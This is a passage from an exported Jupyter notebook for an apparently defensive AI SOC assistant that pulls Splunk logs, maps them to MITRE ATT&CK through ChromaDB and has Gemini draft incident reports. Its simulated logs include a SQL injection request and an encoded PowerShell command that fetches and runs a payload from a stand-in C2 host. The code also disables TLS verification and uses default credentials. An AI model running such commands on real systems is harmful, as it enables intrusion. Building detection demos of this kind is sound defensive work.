        print(f"DEBUG: Successfully obtained Splunk service object. Type: {type(splunk_service)}")
    else:
        print("DEBUG: Splunk service object is None. Connection likely failed or returned None.")
        return "Failed to connect to Splunk. Cannot proceed."
    # --- END OF DIAGNOSTIC PRINTS ---

    print("Retrieving data from Splunk...")

    raw_splunk_events = run_splunk_query(splunk_service, splunk_query, earliest_time="-24h", latest_time="now")

    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")

# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting AI SOC Analyst Assistant (Full Architecture) ---")

    # --- Step 0: Ensure Security Knowledge Base is Populated ---
    print("\n--- Checking/Populating Security Knowledge Base ---")
    total_docs_in_db = security_collection.count()
    
    needs_mitre_population = False
    if total_docs_in_db == 0:
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. MITRE ATT&CK data and sample knowledge need to be populated.")
    else:
        try:
            # Check if MITRE ATT&CK techniques are present
            mitre_techniques_in_db = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])
            if len(mitre_techniques_in_db['ids']) == 0:
                needs_mitre_population = True
                print("MITRE ATT&CK data not present in knowledge base. Populating now...")
            else:
                print(f"MITRE ATT&CK data already present in knowledge base ({len(mitre_techniques_in_db['ids'])} techniques found).")
        except Exception as e:
            print(f"Warning: Error checking for existing MITRE data: {e}. Assuming MITRE data needs population.")
            needs_mitre_population = True

    if needs_mitre_population:
        mitre_data_points = load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH)
        if mitre_data_points:
            populate_security_knowledge_base(mitre_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. AI mapping might be less effective.")
    
    # Add sample general security knowledge (playbooks, past incidents) if not already present
    sample_data_ids = ["playbook_phishing_response", "playbook_malware_containment", "inc_003_unauth_db_access"]
    sample_data_present = False
    try:
        # Check if at least one of the sample data IDs exists
        if security_collection.get(ids=[sample_data_ids[0]], include=[])['ids']:
            sample_data_present = True
    except Exception as e:
        print(f"Warning: Error checking for sample data: {e}. Will attempt to add.")
        sample_data_present = False

    if not sample_data_present:
        print("Sample security knowledge not fully present. Populating now...")
        sample_security_knowledge = [
            {"id": "playbook_phishing_response", "text": "Playbook: Phishing Incident Response. Trigger: User reports suspicious email or email gateway alert. Steps: 1. Verify email authenticity (headers, sender reputation). 2. Check for malicious attachments/links (sandbox). 3. If malicious, remove email from all affected inboxes. 4. Reset user password if credentials compromised. 5. Educate user. 6. Block malicious sender/domains at firewall/proxy. 7. Log and document. Severity: Medium to High depending on compromise.", "metadata": {"type": "playbook", "incident_type": "phishing"}},
            {"id": "playbook_malware_containment", "text": "Playbook: Malware Containment and Eradication. Trigger: EDR alert, antivirus detection, or user report of suspicious activity. Steps: 1. Isolate infected host(s) from network immediately. 2. Collect forensic data (memory dump, process list). 3. Run full endpoint scan. 4. Identify persistence mechanisms (registry, scheduled tasks, services). 5. Remove malware and persistence. 6. Restore affected files from clean backup. 7. Update security definitions. Severity: High.", "metadata": {"type": "playbook", "incident_type": "malware"}},
            {"id": "inc_003_unauth_db_access", "text": "Past Incident: Incident ID INC-2024-003. Type: Unauthorized Access - Database. Date: 2024-05-10. Affected: Customer Database (MySQL). Attack Vector: Brute force via SSH followed by database privilege escalation. Description: Numerous failed SSH logins from external IP, then successful login to 'admin' account, followed by `SELECT * FROM users;` queries. Containment: Blocked source IP at firewall, disabled compromised admin account, rotated DB credentials. Impact: Potential exfiltration of customer PII. Lessons Learned: Implement MFA for all admin accounts, stronger password policies. MITRE ATT&CK T1078 (Valid Accounts), T1110 (Brute Force).", "metadata": {"type": "past_incident", "incident_type": "unauthorized_access", "mitre_id": "T1078, T1110"}},
        ]
        populate_security_knowledge_base(sample_security_knowledge)
    else:
        print("Sample security knowledge appears to be present. Skipping population.")

    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run a combined simulated scenario ---
    # This Splunk query generates mock logs that hint at various security events.
    splunk_simulated_logs = """| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw = case(
    rn=1, "May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=2, "May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=3, "May 24 09:30:10 webserver-01 sshd[12345]: Failed password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=4, "May 24 09:30:15 webserver-01 sshd[12345]: Accepted password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=5, "192.168.1.10 - - [24/May/2025:09:30:20 +0000] \\"GET /admin.php?id=1' UNION SELECT 1,2,3-- HTTP/1.1\\" 404 200 \\"-\\" \\"Mozilla/5.0\\"",
    rn=6, "powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand SQBFAFgAKAAoAE4AZwBvAE0ALgBJAEUAdwAgACgAIgBoAHQAdABwAHM6Ly9jMi5mYWtlZG9vbWFpbi9wYWF5bG9hZC5wc2AwIgApKQAKAA=="
  )
| table _time, host, source, _raw
| sort _time"""

    print("\n\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")
    incident_report = ai_soc_analyst_assistant(
        splunk_simulated_logs,
        incident_summary="Simulated multiple failed SSH login attempts, a successful login, an attempted SQL Injection, and an encoded PowerShell command on an endpoint."
    )
    print("\n--- Final Incident Report ---")
    print(incident_report)

--- Starting AI SOC Analyst Assistant (Full Architecture) ---

--- Checking/Populating Security Knowledge Base ---
MITRE ATT&CK data already present in knowledge base (823 techniques found).
Sample security knowledge appears to be present. Skipping population.

Total unique documents in knowledge base: 826


=== Running Combined Simulated Scenario (with MITRE Mapping) ===
--- Starting AI SOC Analyst Assistant for query ---
DEBUG: Splunk query string:
```
| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw =

  reader = results.ResultsReader(job.results())


In [5]:
import os
import time
import json
from dotenv import load_dotenv

# Splunk SDK imports
import splunklib.client as client
import splunklib.results as results

# ChromaDB import
import chromadb

# Google Gemini imports
import google.generativeai as genai

# STIX2 imports for MITRE ATT&CK parsing
from stix2 import MemoryStore, Filter, AttackPattern, Relationship

# Load environment variables from app.env file
load_dotenv("app.env")

# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme") # IMPORTANT: Update this in app.env
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN") # Optional, not used in current connect_to_splunk

GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Get your key from Google AI Studio (https://makersuite.google.com/).")

# Configure Google Gemini
genai.configure(api_key=GEMINI_API_KEY)
llm = genai.GenerativeModel('gemini-pro') # For text generation
embedding_model = 'embedding-001' # For embeddings

# ChromaDB Settings
CHROMA_DB_PATH = "./chroma_db"
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# MITRE ATT&CK Data File Path
MITRE_STIX_JSON_PATH = "enterprise-attack.json" # Ensure this file is in the same directory as this script

# --- Splunk Connection & Query Functions ---
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    connection_url = f"https://{SPLUNK_HOST}:{SPLUNK_PORT}"
    print(f"Attempting to connect to Splunk at {connection_url}...")
    try:
        service = client.connect(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="https", # Changed from http - Crucial for 8089
            verify=False # IMPORTANT: For testing with self-signed certs. Use True with a proper CA bundle in production!
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        kwargs = {
            "earliest_time": earliest_time,
            "latest_time": latest_time,
            "output_mode": output_mode,
            "app": "search"
        }
        job = service.jobs.create(query, **kwargs)

        print(f"Splunk Job ID: {job.sid}")
        # Wait for the job to complete
        while not job.is_ready():
            time.sleep(0.1)
            # Print the current dispatch state of the job for more detailed debugging
            print(f"Job {job.sid} status: {job.content.get('dispatchState')}") 

        # After job is ready, check if it's done or if there are messages
        if job.is_done():
            print(f"Splunk search job {job.sid} is DONE. Final dispatch state: {job.content.get('dispatchState')}")
            if job.messages: # Check for messages even if done (warnings, etc.)
                print(f"Job {job.sid} messages: {job.messages}")

            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job to free resources on Splunk
            print(f"Successfully retrieved {len(events)} events from Splunk for Job ID {job.sid}.")
            return events
        else: # This block handles cases where the job might not complete successfully
            print(f"Splunk search job {job.sid} did not complete successfully. Final status: {job.content.get('dispatchState')}")
            if job.messages: # Print any error/warning messages
                print(f"Job {job.sid} messages: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []
    
# --- Embedding & ChromaDB Functions ---
def get_embedding(text):
    """Generates an embedding for the given text using the specified Gemini embedding model."""
    try:
        # Use RETRIEVAL_DOCUMENT for texts meant to be retrieved (like knowledge base entries)
        response = genai.embed_content(model=embedding_model, content=text, task_type="RETRIEVAL_DOCUMENT")
        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding for text (first 50 chars): '{text[:50]}...': {e}")
        return None

def load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH):
    """
    Loads MITRE ATT&CK techniques AND their associated mitigations from a STIX 2.x JSON file.
    """
    print(f"Loading MITRE ATT&CK data from {stix_json_path} using stix2...")
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)
        
        attack_data_points = []
        mitigation_data_points = []

        # Query for all Attack Pattern objects (techniques)
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))

        for tech in techniques:
            mitre_id = None
            for ext_ref in tech.external_references:
                if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                    if ext_ref['external_id'].startswith('T'):
                        mitre_id = ext_ref['external_id']
                        break
            if not mitre_id:
                continue

            description = tech.description if hasattr(tech, 'description') else "No description available."
            
            tactics_names = []
            if hasattr(tech, 'x_mitre_tactic_refs'):
                for tactic_ref_id in tech.x_mitre_tactic_refs:
                    tactic_sdo = stix_store.get(tactic_ref_id)
                    if tactic_sdo and tactic_sdo.type == 'tactic':
                        tactics_names.append(tactic_sdo.name)
            tactics_str = ', '.join(tactics_names) if tactics_names else 'N/A'
            
            # Construct full text for embedding for techniques
            full_tech_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {tactics_str}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )
            
            attack_data_points.append({
                "id": mitre_id,
                "text": full_tech_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_str,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })

            # --- NEW: Find mitigations for this technique ---
            # Query for relationships where this technique is the source and the relationship is 'mitigates'
            mitigation_relationships = stix_store.query(
                Filter('source_ref', '=', tech.id),
                Filter('relationship_type', '=', 'mitigates')
            )
            
            for rel in mitigation_relationships:
                mitigation_sdo = stix_store.get(rel.target_ref) # Get the Course-Of-Action object
                if mitigation_sdo and mitigation_sdo.type == 'course-of-action':
                    mitigation_id = None
                    for ext_ref in mitigation_sdo.external_references:
                        if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                            if ext_ref['external_id'].startswith('M'): # Mitigations start with 'M'
                                mitigation_id = ext_ref['external_id']
                                break
                    
                    if mitigation_id:
                        mitigation_description = mitigation_sdo.description if hasattr(mitigation_sdo, 'description') else "No description available."
                        full_mitigation_text = (
                            f"MITRE ATT&CK Mitigation: {mitigation_sdo.name} (ID: {mitigation_id})\n"
                            f"Description: {mitigation_description}\n"
                            f"Mitigates Technique: {tech.name} ({mitre_id})"
                        )
                        
                        mitigation_data_points.append({
                            "id": mitigation_id, # Use the Mitigation ID
                            "text": full_mitigation_text,
                            "metadata": {
                                "type": "mitre_attack_mitigation", # New type
                                "mitigation_id": mitigation_id,
                                "mitigation_name": mitigation_sdo.name,
                                "mitigates_technique_id": mitre_id, # Link back to the technique
                                "source_file": stix_json_path
                            }
                        })
        
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        print(f"Loaded {len(mitigation_data_points)} MITRE ATT&CK mitigations.")

        return attack_data_points + mitigation_data_points # Combine for single populate call

    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/ and place it in the script's directory.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge data points, avoiding duplicates."""
    print(f"Attempting to add {len(data_points)} documents to the knowledge base.")
    
    # Get existing IDs to prevent adding duplicates
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result.get('ids', []))

    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            # Generate a unique ID if not provided (e.g., for custom knowledge)
            unique_id = f"custom_knowledge_{hash(dp['text'])}"

        if unique_id in existing_ids:
            # print(f"Skipping existing document with ID: {unique_id}") # Uncomment for verbose debugging
            continue

        embedding = get_embedding(dp["text"])
        if embedding is not None: # Ensure embedding was successfully generated
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Skipping document due to embedding failure: {dp['text'][:50]}...")

    if docs_to_add:
        try:
            security_collection.add(
                documents=docs_to_add,
                embeddings=embeddings_to_add,
                metadatas=metadatas_to_add,
                ids=ids_to_add
            )
            print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
        except Exception as e:
            print(f"Error adding documents to ChromaDB: {e}")
    else:
        print("No new unique documents to add to the vector store.")

def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    """
    Searches the ChromaDB knowledge base for relevant documents.
    Args:
        query_text (str): The text to search for.
        n_results (int): Number of results to return.
        filter_metadata (dict, optional): A dictionary to filter results by metadata.
                                          E.g., {"type": "mitre_attack_technique"}.
    Returns:
        dict: ChromaDB query results (documents, distances, metadatas).
    """
    query_embedding = get_embedding(query_text)
    if query_embedding is not None:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata # Apply metadata filtering if provided
        )
        return results
    return None

# --- AI Report Generation Function ---
def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    """
    Generates a comprehensive security incident report using Gemini.
    `relevant_knowledge` now primarily contains suggested mitigations.
    """
    # Format MITRE details for the prompt
    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name', 'N/A')} ({mapping.get('technique_id', 'N/A')})\n"
            if mapping.get('tactics') and mapping['tactics'] != 'N/A':
                mitre_details_str += f"  **Tactics:** {mapping['tactics']}\n"
            description_text = str(mapping.get('description', 'No description.')).strip()
            # Extract just the MITRE technique description for brevity in report
            clean_description = description_text.split("Description: ")[1].split("\nURL:")[0].strip() if "Description: " in description_text else description_text
            mitre_details_str += f"  **Description:** {clean_description[:200]}...\n"
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score', 0.0):.4f}\n"

    # Main prompt for Gemini
    prompt = f"""
You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, potential MITRE ATT&CK mappings, and recommended mitigations.

---
**Splunk Logs (Raw Data for Context):**
{splunk_logs}

---
**Potential MITRE ATT&CK Mappings (Most Relevant First):**
{mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

---
**Recommended Mitigations (from Knowledge Base):**
{relevant_knowledge if relevant_knowledge else "No specific mitigation recommendations found. Consider general security best practices."}

---
**Incident Summary (if provided by human analyst):**
{incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

---
**Instructions for Report Generation:**
1.  **Incident Title:** Create a clear and descriptive title for the incident.
2.  **Date/Time of Detection:** Extract the earliest and latest timestamps from the logs. Provide a range if multiple times.
3.  **Affected Systems/Users:** Identify specific hosts, IP addresses, or users mentioned in the logs.
4.  **Description of Incident:** Summarize the observed events chronologically. **Crucially, explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques, referencing their IDs and names from the provided mappings.**
5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified (e.g., "T1078 - Valid Accounts, T1110 - Brute Force").
6.  **Impact:** Briefly describe the potential impact of this incident (e.g., data breach, service disruption, account compromise, unauthorized access).
7.  **Recommended Actions/Remediation:** Based on the identified MITRE techniques and the **"Recommended Mitigations"** section, suggest immediate and long-term actions for containment, eradication, and recovery. If no specific mitigations are found, provide general best practices based on the MITRE techniques.
8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
9.  **Analyst Notes:** Any other observations, open questions, or next steps for further investigation.

Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
"""
    try:
        response = llm.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    print(f"--- Starting AI SOC Analyst Assistant for query ---")
    print(f"DEBUG: Splunk query string:\n```\n{splunk_query}\n```")

    splunk_service = connect_to_splunk()

    if splunk_service:
        print(f"DEBUG: Successfully obtained Splunk service object. Type: {type(splunk_service)}")
    else:
        print("DEBUG: Splunk service object is None. Connection likely failed or returned None.")
        return "Failed to connect to Splunk. Cannot proceed."

    print("Retrieving data from Splunk...")
    raw_splunk_events = run_splunk_query(splunk_service, splunk_query, earliest_time="-24h", latest_time="now")

    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")
        return generate_incident_report("No logs retrieved.", "No relevant knowledge.", [], incident_summary)

    combined_log_text = " ".join([event.get('_raw', '') for event in raw_splunk_events])

    # relevant_knowledge_text will specifically contain mitigations now
    relevant_knowledge_text = "" 

    # Search for relevant MITRE ATT&CK techniques
    mitre_search_results = search_security_knowledge_base(
        combined_log_text, 
        n_results=5, 
        filter_metadata={"type": "mitre_attack_technique"} # Explicitly search only techniques
    )
    
    mitre_mappings = []
    if mitre_search_results and mitre_search_results['documents']:
        for i in range(len(mitre_search_results['documents'][0])):
            doc = mitre_search_results['documents'][0][i]
            meta = mitre_search_results['metadatas'][0][i]
            dist = mitre_search_results['distances'][0][i]

            # Similarity is 1 - (distance^2 / 2) for normalized vectors and Euclidean (L2) distance
            similarity_score = 1 - (dist**2 / 2) 
            
            if similarity_score > 0.7: # Threshold for considering a MITRE mapping relevant
                mitre_mappings.append({
                    "technique_id": meta.get('technique_id'),
                    "technique_name": meta.get('technique_name'),
                    "tactics": meta.get('tactics'),
                    "description": doc, # The full text of the document
                    "distance_score": similarity_score # Pass the calculated similarity
                })

    # --- NEW: Search for relevant MITRE ATT&CK Mitigations ---
    # This search uses a higher threshold or different strategy as it's for 'recommended actions'
    # The query for mitigations could be based on the identified techniques or the raw log text.
    # Let's try searching based on the identified techniques for more relevant mitigations.
    mitigations_text_to_query = ""
    if mitre_mappings:
        mitigations_text_to_query = " ".join([m['description'] for m in mitre_mappings])
    else:
        mitigations_text_to_query = combined_log_text # Fallback to raw logs if no techniques found

    relevant_mitigations_results = search_security_knowledge_base(
        mitigations_text_to_query,
        n_results=3, # Get top 3 most relevant mitigations
        filter_metadata={"type": "mitre_attack_mitigation"} # Explicitly search only mitigations
    )
    
    if relevant_mitigations_results and relevant_mitigations_results['documents']:
        relevant_knowledge_text = "\n**Recommended Mitigations (from MITRE ATT&CK):**\n"
        for i in range(len(relevant_mitigations_results['documents'][0])):
            doc = relevant_mitigations_results['documents'][0][i]
            meta = relevant_mitigations_results['metadatas'][0][i]
            dist = relevant_mitigations_results['distances'][0][i]
            similarity_score = 1 - (dist**2 / 2) # Assuming normalized vectors and Euclidean (L2) distance

            if similarity_score > 0.6: # A slightly lower threshold for suggesting mitigations
                relevant_knowledge_text += (
                    f"* **Mitigation:** {meta.get('mitigation_name')} (ID: {meta.get('mitigation_id')})\n"
                    f"  **Description:** {doc.split('Description: ')[1].split('Mitigates Technique:')[0].strip()[:200]}...\n" # Extract just description
                    f"  **Similarity Score:** {similarity_score:.4f}\n"
                )
    
    # Generate the final report
    report = generate_incident_report(
        "\n".join([event.get('_raw', '') for event in raw_splunk_events]),
        relevant_knowledge_text, # Pass the found mitigations as "relevant_knowledge"
        mitre_mappings,
        incident_summary
    )
    return report


# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting AI SOC Analyst Assistant (Full Architecture) ---")

    # --- Step 0: Ensure Security Knowledge Base is Populated ---
    print("\n--- Checking/Populating Security Knowledge Base ---")
    
    # Check if MITRE data (techniques and mitigations) needs to be populated
    total_docs_in_db = security_collection.count()
    needs_mitre_population = False
    
    if total_docs_in_db == 0:
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. Populating MITRE ATT&CK techniques and mitigations.")
    else:
        # Corrected way to check counts of specific types in ChromaDB
        try:
            tech_ids = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])['ids']
            miti_ids = security_collection.get(where={"type": "mitre_attack_mitigation"}, include=[])['ids']
            tech_count = len(tech_ids)
            miti_count = len(miti_ids)
            
            if tech_count == 0 or miti_count == 0:
                needs_mitre_population = True
                print(f"Missing MITRE techniques ({tech_count}) or mitigations ({miti_count}). Repopulating...")
            else:
                print(f"MITRE ATT&CK data (techniques: {tech_count}, mitigations: {miti_count}) already present.")
        except Exception as e:
            print(f"Warning: Error checking for existing MITRE data: {e}. Assuming MITRE data needs population.")
            needs_mitre_population = True

    if needs_mitre_population:
        # Clear existing collection if we are repopulating to ensure consistency
        print("Clearing existing ChromaDB collection to repopulate with fresh MITRE data...")
        try:
            chroma_client.delete_collection(SECURITY_COLLECTION_NAME)
        except Exception as e:
            print(f"Warning: Could not delete collection (might not exist): {e}")
        security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME) # Recreate
        
        mitre_all_data_points = load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH)
        if mitre_all_data_points:
            populate_security_knowledge_base(mitre_all_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. AI mapping might be less effective.")
    
    # Removed the specific 'sample_security_knowledge' array and its population logic here.
    # If you later want to add other custom knowledge (playbooks, past incidents) 
    # that are NOT MITRE techniques/mitigations, you would add them here using
    # populate_security_knowledge_base with appropriate 'type' metadata (e.g., {"type": "playbook"}).

    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run a combined simulated scenario ---
    # This Splunk query generates mock logs that hint at various security events.
    splunk_simulated_logs = """| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw = case(
    rn=1, "May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=2, "May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=3, "May 24 09:30:10 webserver-01 sshd[12345]: Failed password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=4, "May 24 09:30:15 webserver-01 sshd[12345]: Accepted password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=5, "192.168.1.10 - - [24/May/2025:09:30:20 +0000] \\"GET /admin.php?id=1' UNION SELECT 1,2,3-- HTTP/1.1\\" 404 200 \\"-\\" \\"Mozilla/5.0\\"",
    rn=6, "powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand SQBFAFgAKAAoAE4AZwBvAE0ALgBJAEUAdwAgACgAIgBoAHQAdABwAHM6Ly9jMi5mYWtlZG9vb21haW4vcHNhYXlsb2FkLnBzYDAiKQAKAA=="
  )
| table _time, host, source, _raw
| sort _time"""

    print("\n\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")
    incident_report = ai_soc_analyst_assistant(
        splunk_simulated_logs,
        incident_summary="Simulated multiple failed SSH login attempts, a successful login, an attempted SQL Injection, and an encoded PowerShell command on an endpoint."
    )
    print("\n--- Final Incident Report ---")
    print(incident_report)
    

--- Starting AI SOC Analyst Assistant (Full Architecture) ---

--- Checking/Populating Security Knowledge Base ---
Missing MITRE techniques (823) or mitigations (0). Repopulating...
Clearing existing ChromaDB collection to repopulate with fresh MITRE data...
Loading MITRE ATT&CK data from enterprise-attack.json using stix2...
Loaded 823 MITRE ATT&CK techniques.
Loaded 0 MITRE ATT&CK mitigations.
Attempting to add 823 documents to the knowledge base.


KeyboardInterrupt: 

In [40]:
import os
import time
import json
from dotenv import load_dotenv

# Splunk SDK imports
import splunklib.client as client
import splunklib.results as results

# ChromaDB import
import chromadb

# Google Gemini imports
import google.generativeai as genai

# STIX2 imports for MITRE ATT&CK parsing
from stix2 import MemoryStore, Filter, AttackPattern, Relationship

# Load environment variables from app.env file
load_dotenv("app.env")

# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme") # IMPORTANT: Update this in app.env
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN") # Optional, not used in current connect_to_splunk

GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Get your key from Google AI Studio (https://makersuite.google.com/).")

# Configure Google Gemini
genai.configure(api_key=GEMINI_API_KEY)
llm = genai.GenerativeModel('gemini-2.0-flash') # For text generation
embedding_model = 'embedding-001' # For embeddings

# ChromaDB Settings
CHROMA_DB_PATH = "./chroma_db"
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# MITRE ATT&CK Data File Path
MITRE_STIX_JSON_PATH = "enterprise-attack.json" # Ensure this file is in the same directory as this script

# --- Splunk Connection & Query Functions ---
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    connection_url = f"https://{SPLUNK_HOST}:{SPLUNK_PORT}"
    print(f"Attempting to connect to Splunk at {connection_url}...")
    try:
        service = client.connect(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="https", # Changed from http - Crucial for 8089
            verify=False # IMPORTANT: For testing with self-signed certs. Use True with a proper CA bundle in production!
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        kwargs = {
            "output_mode": output_mode,
            "app": "search"
        }
        job = service.jobs.create(query, **kwargs)

        print(f"Splunk Job ID: {job.sid}")
        # Wait for the job to complete
        max_wait_time = 120 # seconds, e.g., 2 minutes. Adjust as needed.
        start_time = time.time()

